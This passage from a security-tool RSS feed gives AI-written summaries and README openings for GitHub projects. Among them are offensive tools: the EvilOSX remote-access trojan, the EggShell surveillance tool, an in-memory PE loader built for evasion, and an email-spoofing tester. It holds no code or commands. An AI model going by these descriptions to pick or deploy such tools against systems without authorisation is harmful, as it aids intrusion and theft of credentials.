&lt;/p&gt;</description></item><item><title>dotenv</title><link>https://rainmana.github.io/hackyfeed/tools/motdotla-dotenv/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/motdotla-dotenv/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dotenv is a lightweight Node.js module that simplifies the management of environment variables by loading them from a &lt;code&gt;.env&lt;/code&gt; file into &lt;code&gt;process.env&lt;/code&gt;. Its primary use case is to separate application configuration from code, following best practices as outlined in The Twelve-Factor App methodology. Notable features include support for multiline values, custom path configuration, and the ability to preload the module without explicit imports in application code.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="dotenv-npm-version-downloads"&gt;dotenv &lt;a href="https://www.npmjs.com/package/dotenv"&gt;&lt;img src="https://img.shields.io/npm/v/dotenv.svg?style=flat-square" alt="NPM version"&gt;&lt;/a&gt; &lt;a href="https://www.npmjs.com/package/dotenv"&gt;&lt;img src="https://img.shields.io/npm/dw/dotenv" alt="downloads"&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;img src="https://raw.githubusercontent.com/motdotla/dotenv/master/dotenv.svg" alt="dotenv" align="right" width="200" /&gt;
&lt;p&gt;Dotenv is a zero-dependency module that loads environment variables from a &lt;code&gt;.env&lt;/code&gt; file into &lt;a href="https://nodejs.org/docs/latest/api/process.html#process_process_env"&gt;&lt;code&gt;process.env&lt;/code&gt;&lt;/a&gt;. Storing configuration in the environment separate from code is based on &lt;a href="https://12factor.net/config"&gt;The Twelve-Factor App&lt;/a&gt; methodology.&lt;/p&gt;</description></item><item><title>dotenvx</title><link>https://rainmana.github.io/hackyfeed/tools/dotenvx-dotenvx/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dotenvx-dotenvx/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dotenvx is a secure dotenv tool that allows developers to manage environment variables across multiple platforms and programming languages. Its primary use case is to enhance the safety and flexibility of environment variable handling by providing support for encrypted environment files and easy integration into existing applications. Notable features include cross-platform compatibility, multi-environment management, and straightforward installation options via various package managers and direct execution methods.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://dotenvx.com"&gt;&lt;img src="https://dotenvx.com/banner.png" alt="dotenvx"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>dradis-ce</title><link>https://rainmana.github.io/hackyfeed/tools/dradis-dradis-ce/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dradis-dradis-ce/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dradis is an open-source collaboration framework designed for automated penetration testing report generation, enabling InfoSec teams to streamline reporting processes by importing data from various security tools like Burp Suite and Nessus. Its notable features include platform independence, markup support for notes, and a powerful extensions interface that enhances flexibility and usability. Dradis aims to generate consistent and professional pentest reports while minimizing manual efforts, thereby allowing teams to focus on analysis and recommendations.&lt;/p&gt;</description></item><item><title>drakvuf</title><link>https://rainmana.github.io/hackyfeed/tools/tklengyel-drakvuf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tklengyel-drakvuf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DRAKVUF is an agentless, virtualization-based binary analysis tool designed for in-depth execution tracing of arbitrary binaries, including operating systems. Its primary use case is malware analysis, leveraging minimal footprint to remain stealthy during the examination process while supporting a range of Windows and Linux environments. Notable features include the ability to operate without installing additional software in the virtual machine and compatibility with hardware virtualization extensions in Intel CPUs.&lt;/p&gt;</description></item><item><title>DumpsterFire</title><link>https://rainmana.github.io/hackyfeed/tools/trycatchhcf-dumpsterfire/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/trycatchhcf-dumpsterfire/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The DumpsterFire Toolset is a cross-platform, modular tool designed for creating automated, time-delayed security events suitable for both Red and Blue Team exercises. Its primary use case is to facilitate realistic cyber incident simulations and training by allowing users to build customizable event chains that can generate network and filesystem artifacts, enhancing incident response capabilities. Notable features include dynamic extensibility for adding custom event modules, a menu-driven interface for ease of use, and the ability to run exercises in a controlled manner without direct supervision.&lt;/p&gt;</description></item><item><title>dumpulator</title><link>https://rainmana.github.io/hackyfeed/tools/mrexodia-dumpulator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mrexodia-dumpulator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dumpulator is a dynamic code emulation library designed for analyzing minidump files, facilitating the reverse engineering of malware and other binaries. Its primary use case includes emulating function calls and tracing execution paths within dumped memory structures, allowing users to decrypt strings and execute code snippets easily. Notable features comprise memory allocation, UTF-16 string reading, and the ability to trace execution for debugging purposes, all while presenting a clean interface for integration within Python scripts.&lt;/p&gt;</description></item><item><title>EggShell</title><link>https://rainmana.github.io/hackyfeed/tools/lucasjacks0n-eggshell/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lucasjacks0n-eggshell/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; EggShell is a post-exploitation surveillance tool developed in Python, designed for establishing command line sessions on target machines with extended functionalities. Notable features include file uploading/downloading, tab completion, command execution, photo capturing, and device location tracking, with enhanced security through SSL and support for Linux and iOS in version 3.0.0. This tool serves as a proof of concept for penetration testing on devices that users own.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="eggshell"&gt;&lt;a href="http://lucasjackson.io/eggshell"&gt;EggShell&lt;/a&gt;&lt;/h1&gt;
&lt;h2 id="about"&gt;About&lt;/h2&gt;
&lt;p&gt;EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files, tab completion, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more. This is project is a proof of concept, intended for use on machines you own.&lt;/p&gt;</description></item><item><title>elpscrk</title><link>https://rainmana.github.io/hackyfeed/tools/d4vinci-elpscrk/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/d4vinci-elpscrk/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Elpscrk is an intelligent password generation tool designed to create permutations based on user-provided information about a target, effectively generating potential passwords through statistical methodologies. It offers six complication levels ranging from simple to highly complex, enabling tailored password generation based on the user&amp;rsquo;s customization needs. Notably, Elpscrk is memory efficient and capable of producing up to one million password combinations, making it a powerful option for password profiling and security analysis.&lt;/p&gt;</description></item><item><title>EntityFramework-Reverse-POCO-Code-First-Generator</title><link>https://rainmana.github.io/hackyfeed/tools/sjh37-entityframework-reverse-poco-code-first-generator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sjh37-entityframework-reverse-poco-code-first-generator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The EntityFramework Reverse POCO Code First Generator is a tool designed to reverse engineer existing databases and generate fully customizable Entity Framework Code First POCO classes along with configuration mappings and DbContext setups. Its primary use case is to facilitate the rapid creation of data access code that mimics hand-crafted designs, enhancing readability and maintainability. Notable features include support for multiple database types (including SQL Server and PostgreSQL), customizable output through template files, and integration with Visual Studio via a VSIX installer.&lt;/p&gt;</description></item><item><title>enum4linux-ng</title><link>https://rainmana.github.io/hackyfeed/tools/cddmp-enum4linux-ng/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cddmp-enum4linux-ng/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; enum4linux-ng is an advanced enumeration tool designed for extracting information from Windows and Samba systems, primarily targeted at security professionals and CTF participants. It builds on the capabilities of the original enum4linux by incorporating enhanced output parsing, allowing for findings to be exported in YAML or JSON formats, and implementing features such as multiple authentication methods, smart enumeration, and support for both IPv6 and SMBv1.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;enum4linux-ng&lt;/h1&gt;
&lt;p align="center"&gt;
&lt;strong&gt;A next generation version of enum4linux&lt;/strong&gt;
&lt;/p&gt;</description></item><item><title>espoofer</title><link>https://rainmana.github.io/hackyfeed/tools/chenjj-espoofer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/chenjj-espoofer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; espoofer is an open-source tool designed to assess vulnerabilities in email systems related to SPF, DKIM, and DMARC authentication protocols. It aims to aid mail server administrators and penetration testers in identifying potential weaknesses that could be exploited for email spoofing attacks. Notable features include three operational modes—server, client, and manual—that facilitate comprehensive testing of both sending and receiving services.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="espoofer"&gt;espoofer&lt;/h1&gt;
&lt;p&gt;&lt;em&gt;espoofer&lt;/em&gt; is an open-source testing tool to bypass SPF, DKIM, and DMARC authentication in email systems. It helps mail server administrators and penetration testers to check whether the target email server and client are vulnerable to email spoofing attacks or can be abused to send spoofing emails.&lt;/p&gt;</description></item><item><title>Ethical-Hacking-Labs</title><link>https://rainmana.github.io/hackyfeed/tools/samsar4-ethical-hacking-labs/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/samsar4-ethical-hacking-labs/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ethical Hacking Labs is a comprehensive educational resource designed for students and professionals in the cybersecurity field, providing a hands-on approach to learning ethical hacking techniques. It includes a series of tutorials that cover essential topics such as networking, system administration, and various ethical hacking methodologies, from basic to advanced practices. Notable features include practical labs, foundational modules on core knowledge, and guidance on using tools like Metasploit, Maltego, and Recon-ng for effective penetration testing and reconnaissance.&lt;/p&gt;</description></item><item><title>evillimiter</title><link>https://rainmana.github.io/hackyfeed/tools/bitbrute-evillimiter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bitbrute-evillimiter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Evil Limiter is a network management tool designed to monitor, analyze, and control the bandwidth of devices on a local network without needing physical or administrative access. Utilizing ARP spoofing and traffic shaping techniques, it enables users to throttle upload and download speeds for specific hosts, block internet connections, and manage network resources effectively through a command-line interface. Notable features include automatic network configuration detection, the ability to scan IP ranges, and manage hosts dynamically with various commands for limiting and unblocking access.&lt;/p&gt;</description></item><item><title>EvilOSX</title><link>https://rainmana.github.io/hackyfeed/tools/marten4n6-evilosx/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/marten4n6-evilosx/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; EvilOSX is a Remote Administration Tool (RAT) designed for macOS that enables stealthy monitoring and control of compromised systems. It boasts features such as terminal emulation, module extensibility, and the ability to retrieve sensitive user data like passwords and iCloud tokens, all while remaining undetected by antivirus solutions through encrypted payloads. Additionally, it includes functionalities for taking screenshots, recording audio, and executing local privilege escalation attempts, making it a potent tool for unauthorized system access and data exfiltration.&lt;/p&gt;</description></item><item><title>evilwaf</title><link>https://rainmana.github.io/hackyfeed/tools/matrixleons-evilwaf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/matrixleons-evilwaf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; EvilWAF is a sophisticated transparent MITM Firewall bypass proxy and deep WAF vulnerability scanner designed for authorized security testing purposes. It operates at the transport layer, allowing seamless integration with various security tools while employing advanced techniques such as TCP and TLS fingerprint rotation, source port manipulation, and automated WAF detection to evade defensive mechanisms. Notable features include a comprehensive multi-layer WAF scanning capability, direct origin bypass, and a robust IP rotation strategy through Tor and proxy pools, ensuring effective assessment of firewall vulnerabilities.&lt;/p&gt;</description></item><item><title>Exegol</title><link>https://rainmana.github.io/hackyfeed/tools/theporgs-exegol/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/theporgs-exegol/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Exegol is a modular cybersecurity environment tailored for offensive security professionals, addressing traditional security distribution challenges. Its primary use case is for hackers and security experts who require a reliable toolkit for field operations. Notable features include its customizable structure and community-driven design, enhancing usability and effectiveness in practical cybersecurity applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://docs.exegol.com/external/banner.png" alt="banner"&gt;&lt;/p&gt;
&lt;p&gt;Exegol is a comprehensive cybersecurity environment designed by offensive security experts, for fellow hackers, with its community. It solves the common pain points of traditional security distributions by providing a modular and reliable toolkit that&amp;rsquo;s made for the field.&lt;/p&gt;</description></item><item><title>exploitnotes</title><link>https://rainmana.github.io/hackyfeed/tools/hdks-bug-exploitnotes/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hdks-bug-exploitnotes/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Exploit Notes is a comprehensive resource platform designed for security research, focusing on hacking techniques and tools applicable to penetration testing, bug bounty programs, and Capture The Flag (CTF) challenges. It encompasses a wide array of topics including reconnaissance, various operating systems, web applications, databases, networks, and emerging technologies such as AI and blockchain. Users can leverage this repository for educational purposes, with the option to run it locally via a straightforward setup process.&lt;/p&gt;</description></item><item><title>fame</title><link>https://rainmana.github.io/hackyfeed/tools/certsocietegenerale-fame/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/certsocietegenerale-fame/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FAME (FAME Automates Malware Evaluation) is a Python-based framework designed to automate and enhance the analysis of malicious files, enabling analysts to quickly identify malware families and extract relevant configurations and indicators of compromise (IOCs). The tool utilizes Flask for its web interface and Celery for managing background tasks, streamlining the end-to-end analysis process. FAME aims to empower malware analysis efforts by providing an efficient and user-friendly solution for processing malware samples.&lt;/p&gt;</description></item><item><title>faraday</title><link>https://rainmana.github.io/hackyfeed/tools/infobyte-faraday/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/infobyte-faraday/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Faraday is an open-source vulnerability management tool designed to facilitate the organization, aggregation, and visualization of security data in a multiuser environment. Its primary use case is to streamline vulnerability discovery and management by integrating various community tools while providing insightful visualizations for both managers and analysts. Notable features include its command-line interface for direct terminal access, support for multiple installation methods (including Docker and PyPi), and the ability to automate scanning tools within CI/CD pipelines.&lt;/p&gt;</description></item><item><title>FBI-tools</title><link>https://rainmana.github.io/hackyfeed/tools/danieldurnea-fbi-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/danieldurnea-fbi-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FBI-tools is a comprehensive Open Source Intelligence (OSINT) toolkit featuring a variety of tools for analysts to gather and analyze data from multiple online sources. Its notable features include domain squatting detection with SquatSquasher, web reconnaissance capabilities with reNgine, and efficient user account searches across platforms using UsernameSearchOSINT. Additionally, the collection encompasses specialized tools for investigating social media, phone numbers, and dark web intelligence, streamlining the OSINT process.&lt;/p&gt;</description></item><item><title>FilelessPELoader</title><link>https://rainmana.github.io/hackyfeed/tools/saadahla-filelesspeloader/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/saadahla-filelesspeloader/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FilelessPELoader is a tool designed to load and execute AES-encrypted Portable Executable (PE) files directly into memory, bypassing the need for traditional file storage. Its primary use case is to facilitate stealthy execution of payloads in memory, enhancing evasion techniques commonly utilized in cybersecurity attacks. Notable features include the ability to decrypt the PE file in-memory and execute it without leaving traces on disk.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="filelesspeloader"&gt;FilelessPELoader&lt;/h1&gt;
&lt;p&gt;Loading Remote AES Encrypted PE in memory , Decrypted it and run it&lt;/p&gt;</description></item><item><title>FinalRecon</title><link>https://rainmana.github.io/hackyfeed/tools/thewhiteh4t-finalrecon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/thewhiteh4t-finalrecon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FinalRecon is an automated web reconnaissance tool designed to efficiently gather comprehensive information about a target in a short time, maintaining high accuracy without the overhead of multiple dependencies. Notable features include detailed data collection on headers, WHOIS, SSL certificate information, DNS enumeration, subdomain and directory enumeration, web crawling, and a port scanning functionality, all in one compact solution. This tool is especially useful for OSINT practitioners seeking quick and reliable data during the reconnaissance phase of security assessments.&lt;/p&gt;</description></item><item><title>flare-emu</title><link>https://rainmana.github.io/hackyfeed/tools/mandiant-flare-emu/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mandiant-flare-emu/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; flare-emu is an advanced emulation tool that integrates with binary analysis frameworks such as IDA Pro or Radare2, leveraging the Unicorn emulation framework to facilitate flexible and efficient code analysis. It offers multiple interfaces for emulating instruction ranges, iterating through function paths, and handling complex emulation scenarios, making it suitable for deep analysis of executable binaries across various architectures including x86, ARM, and their 64-bit counterparts. Notably, it provides functionalities for user-defined hooks, direct memory manipulation, and dynamic code discovery, enhancing the analyst&amp;rsquo;s ability to probe and understand obfuscated or complex binaries.&lt;/p&gt;</description></item><item><title>Free-Auto-GPT</title><link>https://rainmana.github.io/hackyfeed/tools/intelligenzaartificiale-free-auto-gpt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/intelligenzaartificiale-free-auto-gpt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Free-Auto-GPT is an open-source implementation of autonomous AI agents like Auto-GPT and BabyAGI, designed to operate without paid APIs, thus enabling users to leverage advanced AI capabilities at no cost. Its notable features include easy integration with the Hugging Face and ChatGPT ecosystems, allowing users to access a variety of AI models without significant hardware requirements or financial constraints. This democratizes AI technology, making it accessible for small businesses and individuals seeking to innovate without hefty investments.&lt;/p&gt;</description></item><item><title>fridare</title><link>https://rainmana.github.io/hackyfeed/tools/suifei-fridare/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/suifei-fridare/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Fridare is an automation tool for modifying the Frida server on iOS, Android, Linux, and Windows platforms, designed to enhance security and flexibility by allowing users to change server names and ports while bypassing jailbreak detection. The tool features a dual-mode interface, offering both a robust command line and a modern graphical user interface (GUI) based on the Fyne framework, facilitating intuitive server modifications and visual feedback. Notable functionalities include cross-platform support, binary replacement, custom packaging, and dependency management, making it a comprehensive solution for Frida users across different environments.&lt;/p&gt;</description></item><item><title>fsociety</title><link>https://rainmana.github.io/hackyfeed/tools/fsociety-team-fsociety/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/fsociety-team-fsociety/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; fsociety is a modular penetration testing framework designed to assist cybersecurity professionals in conducting security assessments. Notable features include a command-line interface with options for retrieving information and suggesting tools, as well as support for installation via pip and Docker. The framework&amp;rsquo;s modular approach allows users to integrate various tools for comprehensive security testing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://raw.githubusercontent.com/fsociety-team/fsociety/main/images/fsociety.png" width="600px" alt="fsociety-team/fsociety" /&gt;
&lt;/p&gt;
&lt;h1 id="fsociety"&gt;fsociety&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://pypi.org/project/fsociety/"&gt;&lt;img src="https://img.shields.io/pypi/v/fsociety?color=orange&amp;amp;logo=pypi&amp;amp;logoColor=orange&amp;amp;style=flat-square" alt="PyPI"&gt;&lt;/a&gt;
&lt;a href="https://www.python.org/downloads/"&gt;&lt;img src="https://img.shields.io/badge/python-3.7%2B-blue?logo=python&amp;amp;style=flat-square" alt="Python Version"&gt;&lt;/a&gt;
&lt;img src="https://img.shields.io/pypi/dm/fsociety?style=flat-square" alt="PyPI - Downloads"&gt;
&lt;a href="https://hub.docker.com/r/fsocietyteam/fsociety"&gt;&lt;img src="https://img.shields.io/docker/image-size/fsocietyteam/fsociety/latest?style=flat-square" alt="Docker Image Size (tag)"&gt;&lt;/a&gt;
&lt;a href="http://makeapullrequest.com"&gt;&lt;img src="https://img.shields.io/badge/PRs-welcome-organge.svg?logo=git&amp;amp;logoColor=organge&amp;amp;style=flat-square" alt="PRs Welcome"&gt;&lt;/a&gt;
&lt;a href="https://open.vscode.dev/fsociety-team/fsociety"&gt;&lt;img src="https://img.shields.io/badge/VSCode-Open-0098FF?style=flat-square" alt="Open in Visual Studio Code"&gt;&lt;/a&gt;
&lt;a href="https://twitter.com/fsociety_team"&gt;&lt;img src="https://img.shields.io/twitter/follow/fsociety_team?color=blue&amp;amp;style=flat-square" alt="Twitter Follow"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>fsociety</title><link>https://rainmana.github.io/hackyfeed/tools/manisso-fsociety/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/manisso-fsociety/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Fsociety is a comprehensive penetration testing framework designed to provide a wide array of hacking tools utilized in the Mr. Robot series. It features modules for information gathering, password attacks, wireless testing, exploitation, web hacking, and post-exploitation, all implemented in Python 2, with detailed installation instructions for various platforms, including Docker support. Notable tools included are Nmap, sqlmap, WPScan, and several others tailored for diverse security testing scenarios.&lt;/p&gt;</description></item><item><title>Galaxy-Bugbounty-Checklist</title><link>https://rainmana.github.io/hackyfeed/tools/0xmaximus-galaxy-bugbounty-checklist/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xmaximus-galaxy-bugbounty-checklist/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Galaxy Bugbounty Checklist is a comprehensive tool designed to aid bug bounty hunters by providing an organized and detailed checklist of security assessment techniques. It includes specific references for various testing methodologies such as Account Takeover, CSRF Bypass, and OSINT, making it an essential resource for systematic vulnerability evaluation. Notable features include its structured format and accessibility for users to seek assistance directly through the provided contact.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="notes"&gt;Notes&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;Try to make best Bug Bounty Checklist.&lt;/li&gt;
&lt;li&gt;All checklists come with references.&lt;/li&gt;
&lt;li&gt;Feel free to contact me maximus0xday [at] gmail if you have any question.&lt;/li&gt;
&lt;/ul&gt;
&lt;!--- ![bug bou](https://user-images.githubusercontent.com/63053441/121688913-3de40600-cad9-11eb-81b2-33d85ec42b57.jpg) --&gt;
&lt;img src="https://socialify.git.ci/0xmaximus/Galaxy-Bugbounty-Checklist/image?font=KoHo&amp;forks=1&amp;owner=1&amp;pattern=Circuit%20Board&amp;stargazers=1&amp;theme=Dark" alt="Galaxy-Bugbounty-Checklist" width="640" height="320" /&gt;
&lt;p&gt;To do list:&lt;/p&gt;</description></item><item><title>Garud</title><link>https://rainmana.github.io/hackyfeed/tools/r0x4r-garud/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/r0x4r-garud/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Garud is an automation tool designed for reconnaissance, specifically targeting sub-domain enumeration and vulnerability scanning for injection points such as XSS, SSRF, and SSTI. It integrates multiple popular bug bounty tools, including Assetfinder, Subfinder, and Nuclei, to streamline the scanning process, outputting results systematically while notifying the user upon completion. Notable features include the ability to filter and identify low-hanging vulnerabilities, along with systematic data collection and reporting functionalities.&lt;/p&gt;</description></item><item><title>GDA-android-reversing-Tool</title><link>https://rainmana.github.io/hackyfeed/tools/charles2gan-gda-android-reversing-tool/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/charles2gan-gda-android-reversing-tool/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GDA (GJoy Dex Analyzer) is a powerful Dalvik bytecode decompiler designed for fast analysis of APK, DEX, ODEX, OAT, JAR, CLASS, and AAR files, with minimal memory and disk consumption. It features advanced capabilities including malicious behavior detection, vulnerability scanning, path solving, and deobfuscation, as well as various utilities for interactive operation and assisted analysis. GDA operates natively without requiring a Java VM, making it suitable for use on various Windows systems and virtual machines.&lt;/p&gt;</description></item><item><title>Gemini-API</title><link>https://rainmana.github.io/hackyfeed/tools/hanaokayuzu-gemini-api/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hanaokayuzu-gemini-api/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Gemini-API is an asynchronous Python wrapper for the Google Gemini web application, designed for generating and editing content through natural language queries. Key features include persistent cookie management, image generation capabilities, customization via system prompts and extensions, support for streaming output, and the ability to classify various types of responses. The tool is built on &lt;code&gt;asyncio&lt;/code&gt;, ensuring efficient execution for always-on services and complex interactions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://raw.githubusercontent.com/HanaokaYuzu/Gemini-API/master/assets/banner.png" width="55%" alt="Gemini Banner" align="center"&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
 &lt;a href="https://pypi.org/project/gemini-webapi"&gt;
 &lt;img src="https://img.shields.io/pypi/v/gemini-webapi" alt="PyPI"&gt;&lt;/a&gt;
 &lt;a href="https://pepy.tech/project/gemini-webapi"&gt;
 &lt;img src="https://static.pepy.tech/badge/gemini-webapi" alt="Downloads"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/HanaokaYuzu/Gemini-API/network/dependencies"&gt;
 &lt;img src="https://img.shields.io/librariesio/github/HanaokaYuzu/Gemini-API" alt="Dependencies"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/HanaokaYuzu/Gemini-API/blob/master/LICENSE"&gt;
 &lt;img src="https://img.shields.io/github/license/HanaokaYuzu/Gemini-API" alt="License"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/psf/black"&gt;
 &lt;img src="https://img.shields.io/badge/code%20style-black-000000.svg" alt="Code style"&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Ghost</title><link>https://rainmana.github.io/hackyfeed/tools/entysec-ghost/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/entysec-ghost/</guid><description>&lt;blockquote&gt;
